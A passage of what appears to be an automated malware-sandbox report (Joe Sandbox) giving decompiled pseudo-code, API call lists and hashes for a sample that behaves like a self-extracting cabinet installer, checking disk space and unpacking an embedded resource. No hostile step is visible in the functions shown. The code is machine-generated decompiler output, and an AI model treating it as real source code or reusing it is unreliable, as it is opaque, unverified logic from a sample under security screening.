                                                                                                                                                                                                    					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
                                                                                                                                                                                                    					__eflags = _t73;
                                                                                                                                                                                                    					if(_t73 != 0) {
                                                                                                                                                                                                    						SetCurrentDirectoryA( &_v276); // executed
                                                                                                                                                                                                    						_t101 =  &_v16;
                                                                                                                                                                                                    						_t111 = 6;
                                                                                                                                                                                                    						_t119 = _t118 - _t101;
                                                                                                                                                                                                    						__eflags = _t119;
                                                                                                                                                                                                    						while(1) {
                                                                                                                                                                                                    							_t22 = _t111 - 4; // 0x2
                                                                                                                                                                                                    							__eflags = _t22;
                                                                                                                                                                                                    							if(_t22 == 0) {
                                                                                                                                                                                                    								break;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t87 =  *((intOrPtr*)(_t119 + _t101));
                                                                                                                                                                                                    							__eflags = _t87;
                                                                                                                                                                                                    							if(_t87 == 0) {
                                                                                                                                                                                                    								break;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							 *_t101 = _t87;
                                                                                                                                                                                                    							_t101 = _t101 + 1;
                                                                                                                                                                                                    							_t111 = _t111 - 1;
                                                                                                                                                                                                    							__eflags = _t111;
                                                                                                                                                                                                    							if(_t111 != 0) {
                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							break;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						__eflags = _t111;
                                                                                                                                                                                                    						if(_t111 == 0) {
                                                                                                                                                                                                    							_t101 = _t101 - 1;
                                                                                                                                                                                                    							__eflags = _t101;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						 *_t101 = 0;
                                                                                                                                                                                                    						_t112 = 0x200;
                                                                                                                                                                                                    						_t102 = _v812;
                                                                                                                                                                                                    						_t78 = 0;
                                                                                                                                                                                                    						_t118 = 8;
                                                                                                                                                                                                    						while(1) {
                                                                                                                                                                                                    							__eflags = _t102 - _t112;
                                                                                                                                                                                                    							if(_t102 == _t112) {
                                                                                                                                                                                                    								break;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t112 = _t112 + _t112;
                                                                                                                                                                                                    							_t78 = _t78 + 1;
                                                                                                                                                                                                    							__eflags = _t78 - _t118;
                                                                                                                                                                                                    							if(_t78 < _t118) {
                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							break;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						__eflags = _t78 - _t118;
                                                                                                                                                                                                    						if(_t78 != _t118) {
                                                                                                                                                                                                    							__eflags =  *0x399a34 & 0x00000008;
                                                                                                                                                                                                    							if(( *0x399a34 & 0x00000008) == 0) {
                                                                                                                                                                                                    								L20:
                                                                                                                                                                                                    								_t103 =  *0x399a38; // 0x0
                                                                                                                                                                                                    								_t110 =  *((intOrPtr*)(0x3989e0 + (_t78 & 0x0000ffff) * 4));
                                                                                                                                                                                                    								L21:
                                                                                                                                                                                                    								__eflags = (_v804 & 0x00000003) - 3;
                                                                                                                                                                                                    								if((_v804 & 0x00000003) != 3) {
                                                                                                                                                                                                    									__eflags = _v804 & 0x00000001;
                                                                                                                                                                                                    									if((_v804 & 0x00000001) == 0) {
                                                                                                                                                                                                    										__eflags = _t103 - _t116;
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										__eflags = _t110 - _t116;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									__eflags = _t103 + _t110 - _t116;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								if(__eflags <= 0) {
                                                                                                                                                                                                    									 *0x399124 = 0;
                                                                                                                                                                                                    									_t66 = 1;
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									_t66 = E0039268B(_a4, _t110, _t103,  &_v16);
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								goto L32;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							__eflags = _v816 & 0x00008000;
                                                                                                                                                                                                    							if((_v816 & 0x00008000) == 0) {
                                                                                                                                                                                                    								goto L20;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t105 =  *0x399a38; // 0x0
                                                                                                                                                                                                    							_t110 =  *((intOrPtr*)(0x3989e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0x3989e0 + (_t78 & 0x0000ffff) * 4));
                                                                                                                                                                                                    							_t103 = (_t105 >> 2) +  *0x399a38;
                                                                                                                                                                                                    							goto L21;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t110 = 0x4c5;
                                                                                                                                                                                                    						E003944B9(0, 0x4c5, 0, 0, 0x10, 0);
                                                                                                                                                                                                    						goto L31;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					memset( &_v788, 0, 0x200);
                                                                                                                                                                                                    					 *0x399124 = E00396285();
                                                                                                                                                                                                    					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                    					_t110 = 0x4f9;
                                                                                                                                                                                                    					goto L30;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t110 = 0x4bc;
                                                                                                                                                                                                    					E003944B9(0, 0x4bc, 0, 0, 0x10, 0);
                                                                                                                                                                                                    					 *0x399124 = E00396285();
                                                                                                                                                                                                    					_t66 = 0;
                                                                                                                                                                                                    					L33:
                                                                                                                                                                                                    					return E00396CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}



































                                                                                                                                                                                                    0x0039597d
                                                                                                                                                                                                    0x00395988
                                                                                                                                                                                                    0x0039598f
                                                                                                                                                                                                    0x0039599a
                                                                                                                                                                                                    0x003959a6
                                                                                                                                                                                                    0x003959a8
                                                                                                                                                                                                    0x003959af
                                                                                                                                                                                                    0x003959b9
                                                                                                                                                                                                    0x003959dd
                                                                                                                                                                                                    0x003959e4
                                                                                                                                                                                                    0x003959f1
                                                                                                                                                                                                    0x003959fe
                                                                                                                                                                                                    0x00395a0b
                                                                                                                                                                                                    0x00395a13
                                                                                                                                                                                                    0x00395a19
                                                                                                                                                                                                    0x00395a1b
                                                                                                                                                                                                    0x00395ba1
                                                                                                                                                                                                    0x00395baf
                                                                                                                                                                                                    0x00395bbd
                                                                                                                                                                                                    0x00395bd8
                                                                                                                                                                                                    0x00395bde
                                                                                                                                                                                                    0x00395be3
                                                                                                                                                                                                    0x00395bec
                                                                                                                                                                                                    0x00395bf0
                                                                                                                                                                                                    0x00395bfc
                                                                                                                                                                                                    0x00395c02
                                                                                                                                                                                                    0x00395c02
                                                                                                                                                                                                    0x00395c02
                                                                                                                                                                                                    0x00395c04
                                                                                                                                                                                                    0x00395c04
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395c04
                                                                                                                                                                                                    0x00395a27
                                                                                                                                                                                                    0x00395a3a
                                                                                                                                                                                                    0x00395a46
                                                                                                                                                                                                    0x00395a48
                                                                                                                                                                                                    0x00395a4a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395a64
                                                                                                                                                                                                    0x00395a6a
                                                                                                                                                                                                    0x00395a6c
                                                                                                                                                                                                    0x00395abc
                                                                                                                                                                                                    0x00395ac2
                                                                                                                                                                                                    0x00395ac9
                                                                                                                                                                                                    0x00395aca
                                                                                                                                                                                                    0x00395aca
                                                                                                                                                                                                    0x00395acc
                                                                                                                                                                                                    0x00395acc
                                                                                                                                                                                                    0x00395acf
                                                                                                                                                                                                    0x00395ad1
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395ad3
                                                                                                                                                                                                    0x00395ad6
                                                                                                                                                                                                    0x00395ad8
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395ada
                                                                                                                                                                                                    0x00395adc
                                                                                                                                                                                                    0x00395add
                                                                                                                                                                                                    0x00395add
                                                                                                                                                                                                    0x00395ae0
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395ae0
                                                                                                                                                                                                    0x00395ae2
                                                                                                                                                                                                    0x00395ae4
                                                                                                                                                                                                    0x00395ae6
                                                                                                                                                                                                    0x00395ae6
                                                                                                                                                                                                    0x00395ae6
                                                                                                                                                                                                    0x00395ae9
                                                                                                                                                                                                    0x00395aeb
                                                                                                                                                                                                    0x00395af0
                                                                                                                                                                                                    0x00395af6
                                                                                                                                                                                                    0x00395af8
                                                                                                                                                                                                    0x00395af9
                                                                                                                                                                                                    0x00395af9
                                                                                                                                                                                                    0x00395afb
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395afd
                                                                                                                                                                                                    0x00395aff
                                                                                                                                                                                                    0x00395b00
                                                                                                                                                                                                    0x00395b03
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395b03
                                                                                                                                                                                                    0x00395b05
                                                                                                                                                                                                    0x00395b08
                                                                                                                                                                                                    0x00395b20
                                                                                                                                                                                                    0x00395b27
                                                                                                                                                                                                    0x00395b52
                                                                                                                                                                                                    0x00395b52
                                                                                                                                                                                                    0x00395b5b
                                                                                                                                                                                                    0x00395b62
                                                                                                                                                                                                    0x00395b6b
                                                                                                                                                                                                    0x00395b6d
                                                                                                                                                                                                    0x00395b76
                                                                                                                                                                                                    0x00395b7d
                                                                                                                                                                                                    0x00395b83
                                                                                                                                                                                                    0x00395b7f
                                                                                                                                                                                                    0x00395b7f
                                                                                                                                                                                                    0x00395b7f
                                                                                                                                                                                                    0x00395b6f
                                                                                                                                                                                                    0x00395b72
                                                                                                                                                                                                    0x00395b72
                                                                                                                                                                                                    0x00395b85
                                                                                                                                                                                                    0x00395b98
                                                                                                                                                                                                    0x00395b9e
                                                                                                                                                                                                    0x00395b87
                                                                                                                                                                                                    0x00395b8f
                                                                                                                                                                                                    0x00395b8f
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395b85
                                                                                                                                                                                                    0x00395b29
                                                                                                                                                                                                    0x00395b33
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395b35
                                                                                                                                                                                                    0x00395b48
                                                                                                                                                                                                    0x00395b4a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395b4a
                                                                                                                                                                                                    0x00395b0f
                                                                                                                                                                                                    0x00395b16
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395b16
                                                                                                                                                                                                    0x00395a7c
                                                                                                                                                                                                    0x00395a8a
                                                                                                                                                                                                    0x00395aa5
                                                                                                                                                                                                    0x00395aab
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003959bb
                                                                                                                                                                                                    0x003959c0
                                                                                                                                                                                                    0x003959c7
                                                                                                                                                                                                    0x003959d1
                                                                                                                                                                                                    0x003959d6
                                                                                                                                                                                                    0x00395c05
                                                                                                                                                                                                    0x00395c14
                                                                                                                                                                                                    0x00395c14

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 003959A8
                                                                                                                                                                                                    • SetCurrentDirectoryA.KERNELBASE(?), ref: 003959AF
                                                                                                                                                                                                    • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 00395A13
                                                                                                                                                                                                    • MulDiv.KERNEL32(?,?,00000400), ref: 00395A40
                                                                                                                                                                                                    • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00395A64
                                                                                                                                                                                                    • memset.MSVCRT ref: 00395A7C
                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00395A98
                                                                                                                                                                                                    • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00395AA5
                                                                                                                                                                                                    • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 00395BFC
                                                                                                                                                                                                      • Part of subcall function 003944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00394518
                                                                                                                                                                                                      • Part of subcall function 003944B9: MessageBoxA.USER32(?,?,nst0dum,00010010), ref: 00394554
                                                                                                                                                                                                      • Part of subcall function 00396285: GetLastError.KERNEL32(00395BBC), ref: 00396285
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4237285672-0
                                                                                                                                                                                                    • Opcode ID: 220bdd677d254d0adbe1cfd2007320b14a42577e0867d11eb3f8eaf1786ccd9b
                                                                                                                                                                                                    • Instruction ID: 3fca321c427c06ef9857ecac39e57e0938dcd553f770b286e1713b6b4214438a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 220bdd677d254d0adbe1cfd2007320b14a42577e0867d11eb3f8eaf1786ccd9b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0F718FB190060CAFEF279F64CC85FFA77BCEB48340F1445AAF545D6280EA319E858B64
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 374 394fe0-39501a call 39468f FindResourceA LoadResource LockResource 377 395161-395163 374->377 378 395020-395027 374->378 379 395029-395051 GetDlgItem ShowWindow GetDlgItem ShowWindow 378->379 380 395057-39505e call 394efd 378->380 379->380 383 39507c-3950b4 380->383 384 395060-395077 call 3944b9 380->384 388 3950e8-395104 call 3944b9 383->388 389 3950b6-3950da 383->389 390 395107-39510e 384->390 402 395106 388->402 401 3950dc 389->401 389->402 392 39511d-39511f 390->392 393 395110-395117 FreeResource 390->393 396 39513a-395141 392->396 397 395121-395127 392->397 393->392 399 39515f 396->399 400 395143-39514a 396->400 397->396 398 395129-395135 call 3944b9 397->398 398->396 399->377 400->399 404 39514c-395159 SendMessageA 400->404 405 3950e3-3950e6 401->405 402->390 404->399 405->388 405->402
                                                                                                                                                                                                    C-Code - Quality: 77%
                                                                                                                                                                                                    			E00394FE0(void* __edi, void* __eflags) {
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* _t8;
                                                                                                                                                                                                    				struct HWND__* _t9;
                                                                                                                                                                                                    				int _t10;
                                                                                                                                                                                                    				void* _t12;
                                                                                                                                                                                                    				struct HWND__* _t24;
                                                                                                                                                                                                    				struct HWND__* _t27;
                                                                                                                                                                                                    				intOrPtr _t29;
                                                                                                                                                                                                    				void* _t33;
                                                                                                                                                                                                    				int _t34;
                                                                                                                                                                                                    				CHAR* _t36;
                                                                                                                                                                                                    				int _t37;
                                                                                                                                                                                                    				intOrPtr _t47;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t33 = __edi;
                                                                                                                                                                                                    				_t36 = "CABINET";
                                                                                                                                                                                                    				 *0x399144 = E0039468F(_t36, 0, 0);
                                                                                                                                                                                                    				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
                                                                                                                                                                                                    				 *0x399140 = _t8;
                                                                                                                                                                                                    				if(_t8 == 0) {
                                                                                                                                                                                                    					return _t8;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t9 =  *0x398584; // 0x0
                                                                                                                                                                                                    				if(_t9 != 0) {
                                                                                                                                                                                                    					ShowWindow(GetDlgItem(_t9, 0x842), 0);
                                                                                                                                                                                                    					ShowWindow(GetDlgItem( *0x398584, 0x841), 5); // executed
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t10 = E00394EFD(0, 0); // executed
                                                                                                                                                                                                    				if(_t10 != 0) {
                                                                                                                                                                                                    					__imp__#20(E00394CA0, E00394CC0, E00394980, E00394A50, E00394AD0, E00394B60, E00394BC0, 1, 0x399148, _t33);
                                                                                                                                                                                                    					_t34 = _t10;
                                                                                                                                                                                                    					if(_t34 == 0) {
                                                                                                                                                                                                    						L8:
                                                                                                                                                                                                    						_t29 =  *0x399148; // 0x0
                                                                                                                                                                                                    						_t24 =  *0x398584; // 0x0
                                                                                                                                                                                                    						E003944B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
                                                                                                                                                                                                    						_t37 = 0;
                                                                                                                                                                                                    						L9:
                                                                                                                                                                                                    						goto L10;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					__imp__#22(_t34, "*MEMCAB", 0x391140, 0, E00394CD0, 0, 0x399140); // executed
                                                                                                                                                                                                    					_t37 = _t10;
                                                                                                                                                                                                    					if(_t37 == 0) {
                                                                                                                                                                                                    						goto L9;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					__imp__#23(_t34); // executed
                                                                                                                                                                                                    					if(_t10 != 0) {
                                                                                                                                                                                                    						goto L9;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					goto L8;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t27 =  *0x398584; // 0x0
                                                                                                                                                                                                    					E003944B9(_t27, 0x4ba, 0, 0, 0x10, 0);
                                                                                                                                                                                                    					_t37 = 0;
                                                                                                                                                                                                    					L10:
                                                                                                                                                                                                    					_t12 =  *0x399140; // 0x0
                                                                                                                                                                                                    					if(_t12 != 0) {
                                                                                                                                                                                                    						FreeResource(_t12);
                                                                                                                                                                                                    						 *0x399140 = 0;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					if(_t37 == 0) {
                                                                                                                                                                                                    						_t47 =  *0x3991d8; // 0x0
                                                                                                                                                                                                    						if(_t47 == 0) {
                                                                                                                                                                                                    							E003944B9(0, 0x4f8, 0, 0, 0x10, 0);
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					if(( *0x398a38 & 0x00000001) == 0 && ( *0x399a34 & 0x00000001) == 0) {
                                                                                                                                                                                                    						SendMessageA( *0x398584, 0xfa1, _t37, 0);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					return _t37;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}
















                                                                                                                                                                                                    0x00394fe0
                                                                                                                                                                                                    0x00394fe6
                                                                                                                                                                                                    0x00394ff9
                                                                                                                                                                                                    0x0039500d
                                                                                                                                                                                                    0x00395013
                                                                                                                                                                                                    0x0039501a
                                                                                                                                                                                                    0x00395163
                                                                                                                                                                                                    0x00395163
                                                                                                                                                                                                    0x00395020
                                                                                                                                                                                                    0x00395027
                                                                                                                                                                                                    0x00395037
                                                                                                                                                                                                    0x00395051
                                                                                                                                                                                                    0x00395051
                                                                                                                                                                                                    0x00395057
                                                                                                                                                                                                    0x0039505e
                                                                                                                                                                                                    0x003950a7
                                                                                                                                                                                                    0x003950ad
                                                                                                                                                                                                    0x003950b4
                                                                                                                                                                                                    0x003950e8
                                                                                                                                                                                                    0x003950e8
                                                                                                                                                                                                    0x003950ee
                                                                                                                                                                                                    0x003950ff
                                                                                                                                                                                                    0x00395104
                                                                                                                                                                                                    0x00395106
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395106
                                                                                                                                                                                                    0x003950cd
                                                                                                                                                                                                    0x003950d3
                                                                                                                                                                                                    0x003950da
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003950dd
                                                                                                                                                                                                    0x003950e6
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395060
                                                                                                                                                                                                    0x00395060
                                                                                                                                                                                                    0x00395070
                                                                                                                                                                                                    0x00395075
                                                                                                                                                                                                    0x00395107
                                                                                                                                                                                                    0x00395107
                                                                                                                                                                                                    0x0039510e
                                                                                                                                                                                                    0x00395111
                                                                                                                                                                                                    0x00395117
                                                                                                                                                                                                    0x00395117
                                                                                                                                                                                                    0x0039511f
                                                                                                                                                                                                    0x00395121
                                                                                                                                                                                                    0x00395127
                                                                                                                                                                                                    0x00395135
                                                                                                                                                                                                    0x00395135
                                                                                                                                                                                                    0x00395127
                                                                                                                                                                                                    0x00395141
                                                                                                                                                                                                    0x00395159
                                                                                                                                                                                                    0x00395159
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0039515f

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 0039468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003946A0
                                                                                                                                                                                                      • Part of subcall function 0039468F: SizeofResource.KERNEL32(00000000,00000000,?,00392D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003946A9
                                                                                                                                                                                                      • Part of subcall function 0039468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003946C3
                                                                                                                                                                                                      • Part of subcall function 0039468F: LoadResource.KERNEL32(00000000,00000000,?,00392D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003946CC
                                                                                                                                                                                                      • Part of subcall function 0039468F: LockResource.KERNEL32(00000000,?,00392D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003946D3
                                                                                                                                                                                                      • Part of subcall function 0039468F: memcpy_s.MSVCRT ref: 003946E5
                                                                                                                                                                                                      • Part of subcall function 0039468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003946EF
                                                                                                                                                                                                    • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 00394FFE
                                                                                                                                                                                                    • LoadResource.KERNEL32(00000000,00000000), ref: 00395006
                                                                                                                                                                                                    • LockResource.KERNEL32(00000000), ref: 0039500D
                                                                                                                                                                                                    • GetDlgItem.USER32(00000000,00000842), ref: 00395030
                                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00395037
                                                                                                                                                                                                    • GetDlgItem.USER32(00000841,00000005), ref: 0039504A
                                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00395051
                                                                                                                                                                                                    • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 00395111
                                                                                                                                                                                                    • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 00395159
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                                                                                                                                                    • String ID: *MEMCAB$CABINET
                                                                                                                                                                                                    • API String ID: 1305606123-2642027498
                                                                                                                                                                                                    • Opcode ID: 2f17bcc9211b1f24b41e2ef98e4622fb9ac70840d63d0fac181c4e6e7c55b34a
                                                                                                                                                                                                    • Instruction ID: 2a1e3340a4a9e7eb483006f240ef80932c958d6552fdd59c053e2649537edd02
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2f17bcc9211b1f24b41e2ef98e4622fb9ac70840d63d0fac181c4e6e7c55b34a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 763139B1740702BFEF235B66AC8AF77379CB745755F05051BF901A22A1DAB68C4187A0
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 406 3944b9-3944f8 407 394679-39467b 406->407 408 3944fe-394525 LoadStringA 406->408 411 39467c-39468c call 396ce0 407->411 409 394562-394568 408->409 410 394527-39452e call 39681f 408->410 412 39456b-394570 409->412 420 39453f 410->420 421 394530-39453d call 3967c9 410->421 412->412 415 394572-39457c 412->415 418 3945c9-3945cb 415->418 419 39457e-394580 415->419 424 3945cd-3945cf 418->424 425 394607-394617 LocalAlloc 418->425 422 394583-394588 419->422 426 394544-394554 MessageBoxA 420->426 421->420 421->426 422->422 429 39458a-39458c 422->429 431 3945d2-3945d7 424->431 427 39455a-39455d 425->427 428 39461d-394628 call 391680 425->428 426->427 427->411 435 39462d-39463d MessageBeep call 39681f 428->435 433 39458f-394594 429->433 431->431 434 3945d9-3945ed LocalAlloc 431->434 433->433 436 394596-3945ad LocalAlloc 433->436 434->427 437 3945f3-394605 call 39171e 434->437 444 39463f-39464c call 3967c9 435->444 445 39464e 435->445 436->427 439 3945af-3945c7 call 39171e 436->439 437->435 439->435 444->445 448 394653-394677 MessageBoxA LocalFree 444->448 445->448 448->411
                                                                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                                                                    			E003944B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v64;
                                                                                                                                                                                                    				char _v576;
                                                                                                                                                                                                    				void* _v580;
                                                                                                                                                                                                    				struct HWND__* _v584;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t34;
                                                                                                                                                                                                    				void* _t37;
                                                                                                                                                                                                    				signed int _t39;
                                                                                                                                                                                                    				intOrPtr _t43;
                                                                                                                                                                                                    				signed int _t44;
                                                                                                                                                                                                    				signed int _t49;
                                                                                                                                                                                                    				signed int _t52;
                                                                                                                                                                                                    				void* _t54;
                                                                                                                                                                                                    				intOrPtr _t55;
                                                                                                                                                                                                    				intOrPtr _t58;
                                                                                                                                                                                                    				intOrPtr _t59;
                                                                                                                                                                                                    				int _t64;
                                                                                                                                                                                                    				void* _t66;
                                                                                                                                                                                                    				intOrPtr* _t67;
                                                                                                                                                                                                    				signed int _t69;
                                                                                                                                                                                                    				intOrPtr* _t73;
                                                                                                                                                                                                    				intOrPtr* _t76;
                                                                                                                                                                                                    				intOrPtr* _t77;
                                                                                                                                                                                                    				void* _t80;
                                                                                                                                                                                                    				void* _t81;
                                                                                                                                                                                                    				void* _t82;
                                                                                                                                                                                                    				intOrPtr* _t84;
                                                                                                                                                                                                    				void* _t85;
                                                                                                                                                                                                    				signed int _t89;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t75 = __edx;
                                                                                                                                                                                                    				_t34 =  *0x398004; // 0x74c05eb4
                                                                                                                                                                                                    				_v8 = _t34 ^ _t89;
                                                                                                                                                                                                    				_v584 = __ecx;
                                                                                                                                                                                                    				_t83 = "LoadString() Error.  Could not load string resource.";
                                                                                                                                                                                                    				_t67 = _a4;
                                                                                                                                                                                                    				_t69 = 0xd;
                                                                                                                                                                                                    				_t37 = memcpy( &_v64, _t83, _t69 << 2);
                                                                                                                                                                                                    				_t80 = _t83 + _t69 + _t69;
                                                                                                                                                                                                    				_v580 = _t37;
                                                                                                                                                                                                    				asm("movsb");
                                                                                                                                                                                                    				if(( *0x398a38 & 0x00000001) != 0) {
                                                                                                                                                                                                    					_t39 = 1;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_v576 = 0;
                                                                                                                                                                                                    					LoadStringA( *0x399a3c, _t75,  &_v576, 0x200);
                                                                                                                                                                                                    					if(_v576 != 0) {
                                                                                                                                                                                                    						_t73 =  &_v576;
                                                                                                                                                                                                    						_t16 = _t73 + 1; // 0x1
                                                                                                                                                                                                    						_t75 = _t16;
                                                                                                                                                                                                    						do {
                                                                                                                                                                                                    							_t43 =  *_t73;
                                                                                                                                                                                                    							_t73 = _t73 + 1;
                                                                                                                                                                                                    						} while (_t43 != 0);
                                                                                                                                                                                                    						_t84 = _v580;
                                                                                                                                                                                                    						_t74 = _t73 - _t75;
                                                                                                                                                                                                    						if(_t84 == 0) {
                                                                                                                                                                                                    							if(_t67 == 0) {
                                                                                                                                                                                                    								_t27 = _t74 + 1; // 0x2
                                                                                                                                                                                                    								_t83 = _t27;
